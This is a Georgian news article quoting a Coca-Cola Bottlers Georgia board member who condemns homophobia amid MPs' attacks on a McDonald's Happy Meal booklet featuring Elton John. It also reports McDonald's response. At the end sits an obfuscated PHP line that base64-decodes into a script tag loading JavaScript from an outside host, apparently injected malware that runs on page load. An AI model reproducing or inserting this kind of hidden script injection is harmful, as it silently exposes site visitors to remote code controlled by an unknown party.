celsiusi
ავერსი შნაიდერი

მინდა გამოვეხმაურო ბოლო დღეებში ატეხილ და ეხლაც მიმდინარე, დაუსრულებელ ამბავს რომელიც უკვე გაცდა მაკდონალდსის თემას და პირდაპირ ეხება ჩემს ოჯახს - აღნიშნულ განცხადებას „კოკა კოლა ბოთლერს ჯორჯიას“ სამეთვალყურეო საბჭოს წევრი სოფო ჭყონია სოციალურ ქსელში ავრცელებს. 

"მივიღე ბევრი მუქარა თუ შერაცხყოფა პირად თუ ღია სივრცეში. არ მაინტერესებს ვინ დაგეგმა, რა დაგეგმა და რისთვის, თუმცა ყველაფერი ნათელია. არანაირ პროპაგანდას არ ვეწევი არც მე არც მითუმეტეს მამაჩემი. თუმცა კატეგორიულად ვგმობ ჰომოფობიას და ადამიანის არჩევანის შეზღუდვის ან წართმევის უფლებას!!!! დღესდღეობით პროპაგანდა რუსული ვიცი მარტო რომელმაც მოიცვა საქართველო. სამწუხარო რეალობაში ვცხოვრობთ როდესაც ბნელი ძალები და გაუნათლებლობა უფრო მეტია ვიდრე საღი აზრი! ქვეყანაში ბევრად უფრო მეტი პრობლემაა ვიდრე ეს შემოგდებული, ხელოვნურად ატეხილი აჟიოტაჟია და მცდელობა ყურადღების გადატანის იმ თემებიდან რომელიც ალბათ ყველაზე მეტად უნდა აწუხებდეს თითოეულ საქართველოს მოქალაქეს. იმედი მაქვს მალე ისეთ საქართველოში ვიცხოვრებთ სადაც ყველაზე დიდი პრობლემა ან განხილვის თემა ელტონ ჯონის ქორწინება იქნება",- წერს ჭყონია. 

შეგახსენებთ, რომ Happy meal-ის სასაჩუქრე მენიუს ბროშურაში ცნობილი პოპ-ვარსკვლავის ბიოგრაფიის გამო „მაკდონალდს საქართველო” მმართველი პარტიის დეპუტატებმა გააკრიტიკეს და ის „ამაზრზენ“ ლგბტ პროპაგანდად“ შერაცხეს.

აღნიშნულს გამოეხმაურა კომპანიის ადმინისტრაციაც, “მაკდონალდს საქართველოს” ადმინისტრაციამ დღევანდელ განცხადებაში განმარტა, რომ Happy Meal Readers-ის პროგრამის ფარგლებში გამოიცა ლიცენზირებული წიგნი „პატარა ადამიანები, დიდი მიზნები“, რომელიც მსოფლიოს ყველა “მაკდონალდსში” იდენტური შინაარსით გავრცელდა.

562
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");